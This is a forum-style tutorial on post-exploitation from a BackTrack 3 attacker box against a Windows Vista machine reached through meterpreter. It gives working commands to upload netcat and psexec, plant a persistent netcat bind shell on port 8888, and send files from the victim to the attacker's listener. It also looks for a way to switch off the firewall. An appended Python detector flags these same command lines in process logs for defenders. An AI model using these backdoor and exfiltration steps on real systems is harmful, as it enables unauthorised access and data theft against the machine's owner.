This 'Howto' explains post-exploitation file transfers from a Vista box to a BT3 (BackTrack 3) box.
This process doesn't work if the Windows firewall is on, since the firewall blocks the inbound connection to the listening port. Somebody has to research and find a way to turn it off during the meterpreter session.
I'm assuming that:
1) You are testing this with your own machines, or you have permission to penetrate the Vista box.
2) You've already got a meterpreter session running. If not, maybe this one can help: http://forums.remote-exploit.org/showthread.php?t=19129
3) You've downloaded nc (netcat) for Windows. If not, download: http://joncraton.org/media/files/nc111nt.zip
4) You've downloaded psexec.exe to execute a process remotely. If not, download: http://download.sysinternals.com/Files/PsTools.zip
Now we've got our tools. Let's start by uploading the required files. They can be uploaded to the root folder, or you can make a new folder with the mkdir command. Say we want to upload our files to the c:\xxx folder of the victim (Vista) box. So go to the C drive and prepare the folder.
An ls will show you that the folder has been created.
Open the root directory of the BT3 box and unzip the nc111nt.zip and PsTools.zip files.
Uploading the files
We just need 2 files. Upload them:
upload /root/nc111nt/nc.exe nc.exe
upload /root/PsTools/psexec.exe psexec.exe
An ls will show you that the files have been uploaded.
Opening the backdoor
Open a command shell by entering this at the meterpreter prompt:
execute -f cmd.exe -c -H -i
Run nc and keep it running (that's our backdoor) to keep port 8888 open. Here, username and password are the admin username and password of the Vista box. You should already know these (because you own the box, don't you?). In the real world it's possible to crack these, but that is not covered in this tut.
psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 8888
Using the backdoor to transfer files
OK... now that we've got our door, you can press Ctrl+C to terminate the command shell and then type exit to close the meterpreter session. Open a fresh konsole and use telnet to connect to the victim anytime:
Here 192.168.x.x is the victim's IP address. In my case, it's 192.168.1.2
telnet 192.168.x.x 8888
You should see:
Connected to 192.168.1.2.
Escape character is '^]'.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
We will call this the "Shell".
Files can be transferred from any location on the Vista box to any location on the BT3 box, as long as the correct file paths are provided.
To receive the xxxx.txt file into the yyyy directory under /root on the BT3 box, first prepare the BT3 box. Open another konsole and enter:
nc -vv -l -p 10000 > /root/yyyy/xxxx.txt
Now, to send the file from the zzzz folder on the C drive of the Vista box, go to the "Shell" and enter:
Here, 192.168.y.y is the BT3 box's (attacker's) IP address.
nc 192.168.y.y 10000 < C:\zzzz\xxxx.txt
The file should be downloaded to the desired folder.
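From the defender's side, every step above leaves a distinctive process command line on the Vista box (psexec aimed at 127.0.0.1, nc.exe with -L -e cmd.exe, an outbound nc to port 10000). As an added example that is not part of the original post, this script flags those patterns in process-creation telemetry such as Sysmon Event ID 1; the sample command lines are constructed to mirror the tutorial's steps, and the detection names are my own.

```python
# Added example (not from the original post): flag the netcat/psexec command
# lines used in this tutorial in process-creation telemetry. The sample
# command lines at the bottom are constructed for the demo.

NETCAT_NAMES = {"nc", "nc.exe", "nc64.exe", "ncat", "ncat.exe", "netcat.exe"}
SHELL_NAMES = {"cmd", "cmd.exe", "powershell", "powershell.exe", "sh", "bash"}

def basename(token):
    """Strip quotes and any path; return the lower-cased file name."""
    return token.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()

def listen_port(args):
    """Port from '-p N' if present, else the last bare number (ncat style)."""
    for i, tok in enumerate(args):
        if tok == "-p" and i + 1 < len(args) and args[i + 1].isdigit():
            return args[i + 1]
    nums = [a for a in args if a.isdigit()]
    return nums[-1] if nums else "?"

def classify(cmdline):
    """Return a list of findings (strings) for one process command line."""
    findings = []
    tokens = cmdline.split()
    names = [basename(t) for t in tokens]
    # psexec against 127.0.0.1: used in the tutorial to launch nc.exe via the
    # service manager so it outlives the meterpreter shell
    if "psexec" in names or "psexec.exe" in names:
        target = next((t for t in tokens if t.startswith("\\\\")), "")
        if target.lstrip("\\").lower() in ("127.0.0.1", "localhost"):
            findings.append("psexec run against localhost")
    nc_at = next((i for i, n in enumerate(names) if n in NETCAT_NAMES), None)
    if nc_at is None:
        return findings
    args = tokens[nc_at + 1:]  # only netcat's own arguments (skips psexec's -p)
    listens = any(a in ("-l", "-L") for a in args)  # -L: nc111nt persistent listen
    spawns = any(a.lower() in ("-e", "-c") and i + 1 < len(args)  # -e nc, -c ncat
                 and basename(args[i + 1]) in SHELL_NAMES for i, a in enumerate(args))
    if listens and spawns:
        findings.append(f"netcat bind shell on port {listen_port(args)}")
    elif spawns:
        findings.append("netcat shell pushed to a remote host")
    elif listens:
        findings.append(f"netcat listener on port {listen_port(args)}")
    else:  # plain client: host and port are the first two non-flag arguments
        dest = [a for a in args if not a.startswith("-")][:2]
        findings.append("netcat outbound connection to " + ":".join(dest))
    return findings

SAMPLE_CMDLINES = [  # constructed, mirroring the tutorial's steps
    "cmd.exe /c dir",
    r"psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 8888",
    r"c:\xxx\nc.exe -L -d -e cmd.exe -p 8888",
    r"nc 192.168.y.y 10000 < C:\zzzz\xxxx.txt",
]

def scan(cmdlines):
    """Map each flagged command line to its findings; clean lines are omitted."""
    return {c: hits for c in cmdlines if (hits := classify(c))}

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_CMDLINES).items():
        print(f"{'; '.join(hits):45s} <- {line}")
```

On the network side the same activity shows up as an unexpected listener on 8888 and a single outbound connection to the attacker's port 10000, so pairing this with firewall or netflow logs confirms the finding.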